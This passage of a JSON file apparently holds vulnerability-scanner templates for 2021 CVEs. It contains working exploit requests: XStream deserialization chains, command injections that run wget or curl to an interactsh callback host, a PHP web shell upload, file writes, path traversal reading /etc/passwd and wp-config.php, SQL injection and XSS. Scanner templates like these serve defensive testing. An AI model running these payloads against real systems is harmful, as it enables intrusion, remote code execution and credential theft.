0=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"phar://../storage/logs/laravel.log/test.txt\"}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","Illuminate"],"condition":"and"},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-32618","info":{"name":"Python Flask-Security - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=\\\\\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-46072","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_service HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1\n","GET /admin/?page=maintenance/services HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-46419","info":{"name":"Telesquare TLR-2855KS6 - Arbitrary File Deletion","severity":"critical"},"requests":[{"raw":["PUT /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nDNT: 1\n\n{{randstr}}\n","DELETE /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nDNT: 1\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 201 && status_code_2 == 204","contains(server_1, \"lighttpd\")"],"condition":"and"}]}]},{"id":"CVE-2021-39146","info":{"name":"XStream 1.4.18 - Arbitrary Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='javax.swing.MultiUIDefaults' serialization='custom'>\n      <unserializable-parents/>\n      <hashtable>\n          <default>\n            <loadFactor>0.75</loadFactor>\n            <threshold>525</threshold>\n          </default>\n          <int>700</int>\n          <int>0</int>\n      </hashtable>\n      <javax.swing.UIDefaults>\n          <default>\n            <defaultLocale>zh_CN</defaultLocale>\n            <resourceCache/>\n          </default>\n      </javax.swing.UIDefaults>\n      <javax.swing.MultiUIDefaults>\n          <default>\n            <tables>\n            <javax.swing.UIDefaults serialization='custom'>\n              <unserializable-parents/>\n              <hashtable>\n                <default>\n                  <loadFactor>0.75</loadFactor>\n                  <threshold>525</threshold>\n                </default>\n                <int>700</int>\n                <int>1</int>\n                <string>lazyValue</string>\n                <javax.swing.UIDefaults_-ProxyLazyValue>\n                  <className>javax.naming.InitialContext</className>\n                  <methodName>doLookup</methodName>\n                  <args>\n                    <string>ldap://{{interactsh-url}}/#evil</string>\n                  </args>\n                </javax.swing.UIDefaults_-ProxyLazyValue>\n              </hashtable>\n              <javax.swing.UIDefaults>\n                <default>\n                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>\n                  <resourceCache/>\n                </default>\n              </javax.swing.UIDefaults>\n            </javax.swing.UIDefaults>\n            </tables>\n          </default>\n      </javax.swing.MultiUIDefaults>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-32819","info":{"name":"Nodejs Squirrelly - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Wget"]}]}]},{"id":"CVE-2021-36380","info":{"name":"Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi/networkDiag.cgi HTTP/1.1\nHost: {{Hostname}}\n\ncommand=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-1472","info":{"name":"Cisco Small Business RV Series - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nCookie: sessionid='`wget http://{{interactsh-url}}`'\nAuthorization: QUt6NkpTeTE6dmk4cW8=\nContent-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536\n\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"option\"\n\n5NW9Cw1J\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"destination\"\n\nJ0I5k131j2Ku\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file.path\"\n\nEKsmqqg0\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file\"; filename=\"config.xml\"\nContent-Type: application/xml\n\nqJ57CM9\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"filename\"\n\nJbYXJR74n.xml\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"GXbLINHYkFI\"\n\n<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>\n-----------------------------392306610282184777655655237536--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["\"jsonrpc\":"]}]}]},{"id":"CVE-2021-27909","info":{"name":"Mautic <3.3.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert(document.domain);var ok='","mauticBasePath"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24150","info":{"name":"WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44451","info":{"name":"Apache Superset <=1.3.2 - Default Login","severity":"medium"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf_token}}&username={{username}}&password={{password}}\n","GET /dashboard/list/ HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["session"]},{"type":"word","part":"body_3","words":["DashboardFilterStateRestApi"]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["name=\"csrf_token\" type=\"hidden\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-26702","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25899","info":{"name":"Void Aural Rec Monitor 9.0.0.1 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /AurallRECMonitor/services/svc-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparam1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))dummy)--+dummy&param2=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Contacte con el administrador\")"],"condition":"and"}]}]},{"id":"CVE-2021-33851","info":{"name":"WordPress Customize Login Image <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=\n","GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(header_4, \"text/html\")","contains(body_4, \"Go to <script>alert(document.domain)</script>\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-41291","info":{"name":"ECOA Building Automation System - Directory Traversal Content Disclosure","severity":"high"},"requests":[{"raw":["GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-21351","info":{"name":"XStream <1.4.16 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>\n      <m__DTMXRTreeFrag>\n        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>\n          <m__size>-10086</m__size>\n          <m__mgrDefault>\n            <__overrideDefaultParser>false</__overrideDefaultParser>\n            <m__incremental>false</m__incremental>\n            <m__source__location>false</m__source__location>\n            <m__dtms>\n              <null/>\n            </m__dtms>\n            <m__defaultHandler/>\n          </m__mgrDefault>\n          <m__shouldStripWS>false</m__shouldStripWS>\n          <m__indexing>false</m__indexing>\n          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>\n            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>\n              <javax.sql.rowset.BaseRowSet>\n                <default>\n                  <concurrency>1008</concurrency>\n                  <escapeProcessing>true</escapeProcessing>\n                  <fetchDir>1000</fetchDir>\n                  <fetchSize>0</fetchSize>\n                  <isolation>2</isolation>\n                  <maxFieldSize>0</maxFieldSize>\n                  <maxRows>0</maxRows>\n                  <queryTimeout>0</queryTimeout>\n                  <readOnly>true</readOnly>\n                  <rowSetType>1004</rowSetType>\n                  <showDeleted>false</showDeleted>\n                  <dataSource>rmi://{{interactsh-url}}/test</dataSource>\n                  <listeners/>\n                  <params/>\n                </default>\n              </javax.sql.rowset.BaseRowSet>\n              <com.sun.rowset.JdbcRowSetImpl>\n                <default/>\n              </com.sun.rowset.JdbcRowSetImpl>\n            </fPullParserConfig>\n            <fConfigSetInput>\n              <class>com.sun.rowset.JdbcRowSetImpl</class>\n              <name>setAutoCommit</name>\n              <parameter-types>\n                <class>boolean</class>\n              </parameter-types>\n            </fConfigSetInput>\n            <fConfigParse reference='../fConfigSetInput'/>\n            <fParseInProgress>false</fParseInProgress>\n          </m__incrementalSAXSource>\n          <m__walker>\n            <nextIsRaw>false</nextIsRaw>\n          </m__walker>\n          <m__endDocumentOccured>false</m__endDocumentOccured>\n          <m__idAttributes/>\n          <m__textPendingStart>-1</m__textPendingStart>\n          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>\n          <m__pastFirstElement>false</m__pastFirstElement>\n        </m__dtm>\n        <m__dtmIdentity>1</m__dtmIdentity>\n      </m__DTMXRTreeFrag>\n      <m__dtmRoot>1</m__dtmRoot>\n      <m__allowRelease>false</m__allowRelease>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-21801","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39312","info":{"name":"WordPress True Ranker <2.2.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nsrc=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42887","info":{"name":"TOTOLINK EX1200T 4.1.2cu.5215 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /login.htm HTTP/1.1\nHost: {{Hostname}}\n","GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["TOTOLINK"]},{"type":"word","part":"header_2","words":["Set-Cookie: SESSION_ID="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-33357","info":{"name":"RaspAP <=2.6.5 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["DHCPEnabled"]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-41826","info":{"name":"PlaceOS 1.2109.1 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/logout?continue=//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301],"condition":"or"}]}]},{"id":"CVE-2021-39211","info":{"name":"GLPI 9.2/<9.5.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/telemetry.php","{{BaseURL}}/glpi/ajax/telemetry.php"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"uuid\":","\"glpi\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35587","info":{"name":"Oracle Access Manager - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/oam/server/opensso/sessionservice"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["x-oracle-dms-ecid","x-oracle-dms-rid"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"body","words":["/oam/pages/css/general.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31682","info":{"name":"WebCTRL OEM <= 6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","common/lvl5"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42567","info":{"name":"Apereo CAS Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cas/v1/tickets/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img/src/onerror=alert(document.domain)>","java.util.HashMap"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-30175","info":{"name":"ZEROF Web Server 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /HandleEvent HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nAjax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&\"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff\"&_seq_=2&_uo_=O\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["You have an error in your SQL syntax"]},{"type":"word","part":"header","words":["ZEROF"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39152","info":{"name":"XStream <1.4.18 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs>GBK</cs>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2021-20092","info":{"name":"Buffalo WSR-2533DHPL2 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}} HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=8; url=ping.html; mobile=false;\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-javascript"]},{"type":"word","words":["/*DEMO*/","addCfg("],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-36356","info":{"name":"Kramer VIAware - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nradioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php\n","GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute(\"curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'\")}' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-45232","info":{"name":"Apache APISIX Dashboard <2.10.1 - API Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{RootURL}}/apisix/admin/migrate/export"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Consumers\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3293","info":{"name":"emlog 5.3.1 Path Disclosure","severity":"medium"},"requests":[{"raw":["GET /t/index.php?action[]=aaaa HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<b>Warning</b>","on line","expects parameter"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24370","info":{"name":"WordPress Fancy Product Designer <4.6.9  - Arbitrary File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"error\":\"You need to define a directory"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41282","info":{"name":"pfSense - Arbitrary File Write","severity":"high"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=\n","GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\\x3c\\x3fphp+var_dump(md5(\\x27CVE-2021-41282\\x27));unlink(__FILE__)\\x3b\\x3f\\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1\nHost: {{Hostname}}\n","GET /test.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'c3959e8a43f1b39b0d1255961685a238')","status_code==200"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["(sid:[a-z0-9,;:]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-27314","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Doctor Appoinment System\")"],"condition":"and"}]}]},{"id":"CVE-2021-24316","info":{"name":"WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(/{{randstr}}/)</script>","Sorry, no posts matched your criteria."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25085","info":{"name":"WOOF WordPress plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"additional_fields\":[\"<img src=x onerror=alert(document.domain)>\"]}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1497","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /auth/change HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n","POST /auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-24274","info":{"name":"WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40856","info":{"name":"Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /about/../tree?action=get HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"TYPE\"","\"ITEMS\"","\"COUNT\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29484","info":{"name":"Ghost CMS <=4.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ghost/preview"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XMLHttpRequest.prototype.open"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1498","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command 